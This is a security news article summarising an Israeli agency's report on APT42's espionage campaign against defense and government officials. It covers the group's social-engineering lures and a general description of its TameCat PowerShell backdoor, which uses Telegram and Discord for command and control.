The Iranian state-sponsored hacking group APT42 has been targeting senior defense and government officials in an ongoing, sophisticated espionage campaign, the Israel National Digital Agency (INDA) reports.
As part of the attacks, the hackers relied on social engineering tactics, and expanded their scope by targeting the victims’ family members, to increase the attack surface and apply increased pressure on the primary targets.
Also known as Calanque, CharmingCypress, Educated Manticore, Mint Sandstorm, and UNC788, and associated with the Islamic Revolutionary Guard Corps (IRGC) intelligence agency, APT42 is tracked by the Israeli agency as SpearSpecter.
The new campaign uncovered by INDA involved invitations to conferences or meetings that either directed victims to spoofed web pages to harvest their credentials, or led to backdoor infections, for long-term access and data exfiltration.
The hackers were observed spending days or weeks building relationships with the intended victims and gathering intelligence via social media, public databases, and professional networks.
“This enables them to impersonate people from the victim’s affiliations and craft believable scenarios involving exclusive conferences or strategic meetings (physical in some cases). They sustain multi-day conversations to build credibility. Use of WhatsApp further adds perceived legitimacy,” INDA notes.
Based on the target’s value and the group’s operational objectives, the recipient is either directed to phishing pages or served a decoy document that triggers the deployment of APT42’s TameCat malware.
A sophisticated, modular PowerShell-based backdoor, TameCat establishes command-and-control (C&C) communication over Telegram and Discord, establishes persistence, performs system reconnaissance, and collects browser data and credentials.
It can also execute commands and exfiltrate data, and allows operators to dynamically load and execute additional payloads.
To evade detection, the malware operates as an in-memory loader, uses signed Windows binaries and common user tools to blend with normal activity, and employs various obfuscation techniques. It also uses an in-memory encryption mechanism to protect telemetry and controller payloads.
TameCat relies on Telegram to load its payloads. It evaluates all received messages and, if they lack specific parameters, treats them as PowerShell payloads and executes them. It then sends the result of the operation as a message.
“This approach enables the attacker to maintain dynamic and resilient remote code execution capabilities on compromised hosts. This ensures persistence and operational continuity even when protective measures, such as Cloudflare, block the actor’s infrastructure,” INDA notes.
Discord, it explains, is used as a C&C communication channel to issue unique commands to individual hosts while managing multiple attacks.
The backdoor uses four modules for system reconnaissance. They allow it to selectively gather high-value data from the victims’ systems, such as browser information, documents, screenshots, and system information, and exfiltrate it via encrypted channels.
“The SpearSpecter campaign’s infrastructure reflects a sophisticated blend of agility, stealth, and operational security designed to sustain prolonged espionage against high-value targets. The operators leverage a multifaceted infrastructure that combines legitimate cloud services with attacker-controlled resources, enabling seamless initial access, persistent C&C, and covert data exfiltration,” INDA notes.
Related: Iranian APT Targets Android Users With New Variants of DCHSpy Spyware
Related: US Charges 3 Iranians Over Presidential Campaign Hacking
Related: US Calls Reported Threats by Pro-Iran Hackers to Release Trump-Tied Material a ‘Smear Campaign’
Related: Iranian Hackers’ Preferred ICS Targets Left Open Amid Fresh US Attack Warning
